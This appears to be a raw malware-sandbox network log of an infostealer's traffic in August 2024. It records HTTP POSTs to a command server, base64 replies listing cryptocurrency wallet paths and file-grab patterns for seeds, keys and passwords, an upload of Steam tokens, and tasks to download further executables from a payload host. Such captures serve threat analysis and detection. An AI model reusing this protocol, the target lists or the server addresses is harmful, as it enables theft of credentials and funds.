                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                      Aug 29, 2024 22:52:30.613019943 CEST181OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHD
                                                      Host: 147.45.68.138
                                                      Content-Length: 1145
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:31.458422899 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:31 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:31.692099094 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----GHJKJDAKEHJDGDGDGHID
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 4a 44 41 4b 45 48 4a 44 47 44 47 44 47 48 49 44 2d 2d 0d 0a
                                                      Data Ascii: ------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------GHJKJDAKEHJDGDGDGHIDContent-Disposition: form-data; name="mode"3------GHJKJDAKEHJDGDGDGHID--
                                                      Aug 29, 2024 22:52:32.224139929 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:32 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 [TRUNCATED]
                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxwYXNzcGhyYXNlLmpzb258MHxFeG9kdXN8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHNlZWQuc2Vjb3wwfEV4b2R1c3wxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RXhvZHVzfDF8XEV4b2R1c1xiYWNrdXBzXHwqLip8MXxFbGVjdHJvbiBDYXNofDF8XEVsZWN0cm9uQ2FzaFx3YWxsZXRzXHwqLip8MHxNdWx0aURvZ2V8MXxcTXVsdGlEb2d [TRUNCATED]
                                                      Aug 29, 2024 22:52:32.226049900 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----KJKJJJECFIEBFHIEGHJD
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 48 4a 44 2d 2d 0d 0a
                                                      Data Ascii: ------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------KJKJJJECFIEBFHIEGHJDContent-Disposition: form-data; name="mode"4------KJKJJJECFIEBFHIEGHJD--
                                                      Aug 29, 2024 22:52:32.799333096 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:32 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e 52 6a 4b 69 34 71 4c 43 70 69 61 58 52 6d 62 48 6c 6c 63 69 6f 75 4b 69 77 71 61 33 56 6a 62 32 6c 75 4b 69 34 71 4c 43 70 6f 64 57 39 69 61 53 6f 75 4b 69 77 71 63 47 39 73 62 32 35 70 5a 58 67 71 4c 69 6f 73 4b 6d 74 79 59 [TRUNCATED]
                                                      Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0YnRjKi4qLCpiaXRmbHllciouKiwqa3Vjb2luKi4qLCpodW9iaSouKiwqcG9sb25pZXgqLiosKmtyYWtlbiouKiwqb2tleCouKiwqYmluYW5jZSouKiwqYml0ZmluZXgqLiosKmdkYXgqLiosKmV0aGVyZXVtKi4qLCpleG9kdXMqLiosKm1ldGFtYXNrKi4qLCpteWV0aGVyd2FsbGV0Ki4qLCplbGVjdHJ1bSouKiwqYml0Y29pbiouKiwqYmxvY2tjaGFpbiouKiwqY29pbm9taSouKiwqd29yZHMqLiosKm1ldGEqLiosKm1hc2sqLiosKmV0aCouKiwqcmVjb3ZlcnkqLip8MTUwfDN8KndpbmRvd3MqLCpQcm9ncmFtIEZpbGVzKiwqUHJvZ3JhbSBGaWxlcyAoeDg2KSosKkFwcERhdGEqLCpQcm9ncmFtRGF0YSosKi5sbmssKi5leGUsKi5zY3IsKi5jb20sKi5waWYsKi5tcDN8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl [TRUNCATED]
                                                      Aug 29, 2024 22:52:32.818490982 CEST637OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----AKJKFBAFIDAEBFHJKJEB
                                                      Host: 147.45.68.138
                                                      Content-Length: 457
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 [TRUNCATED]
                                                      Data Ascii: ------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AKJKFBAFIDAEBFHJKJEBContent-Disposition: form-data; name="file_data"N+dA------AKJKFBAFIDAEBFHJKJEB--
                                                      Aug 29, 2024 22:52:33.356858015 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:33 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:33.393395901 CEST183OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDA
                                                      Host: 147.45.68.138
                                                      Content-Length: 115113
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Aug 29, 2024 22:52:34.554408073 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:34 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:34.557900906 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 2d 2d 0d 0a
                                                      Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="mode"5------CFIECBFIDGDAKFHIEHJK--
                                                      Aug 29, 2024 22:52:35.184029102 CEST350INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:35 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 62 30 0d 0a 4d 54 41 7a 4e 54 51 30 4d 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 44 42 6a 5a 44 68 6d 59 6a 5a 6d 4e 32 4a 66 62 47 64 71 5a 6d 51 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 44 4d 31 4e 44 51 78 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6b 4d 47 4e 6b 4f 57 45 32 4e 57 49 31 5a 46 39 32 63 58 64 6c 63 6d 64 6d 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: b0MTAzNTQ0MHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZDBjZDhmYjZmN2JfbGdqZmQuZXhlfDF8a2tra3wxMDM1NDQxfGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZkMGNkOWE2NWI1ZF92cXdlcmdmLmV4ZXwxfGtra2t80
                                                      Aug 29, 2024 22:52:36.432264090 CEST679OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG
                                                      Host: 147.45.68.138
                                                      Content-Length: 499
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d [TRUNCATED]
                                                      Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="mode"51------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="task_id"1035440------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="status"1------HIEBAKEHDHCAKEBFBKEG--
                                                      Aug 29, 2024 22:52:37.154886961 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:37.585272074 CEST679OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----JDGCGDBGCAAEBFIECGHD
                                                      Host: 147.45.68.138
                                                      Content-Length: 499
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d [TRUNCATED]
                                                      Data Ascii: ------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="mode"51------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="task_id"1035441------JDGCGDBGCAAEBFIECGHDContent-Disposition: form-data; name="status"1------JDGCGDBGCAAEBFIECGHD--
                                                      Aug 29, 2024 22:52:38.305569887 CEST175INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 29 Aug 2024 20:52:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 2ok0
                                                      Aug 29, 2024 22:52:38.306652069 CEST511OUTPOST / HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----DHIEBAAKJDHIECAAFHCA
                                                      Host: 147.45.68.138
                                                      Content-Length: 331
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 31 34 66 32 34 64 61 39 34 64 37 38 65 34 37 66 33 38 36 36 31 31 33 39 30 62 64 64 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 38 34 62 31 63 65 62 37 37 64 63 66 34 37 30 62 37 35 39 62 65 64 64 37 62 62 31 34 30 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 41 2d 2d 0d 0a
                                                      Data Ascii: ------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="token"bc14f24da94d78e47f386611390bdd56------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="build_id"4384b1ceb77dcf470b759bedd7bb140b------DHIEBAAKJDHIECAAFHCAContent-Disposition: form-data; name="mode"6------DHIEBAAKJDHIECAAFHCA--
                                                      Aug 29, 2024 22:52:38.867414951 CEST168INHTTP/1.1 200 OK
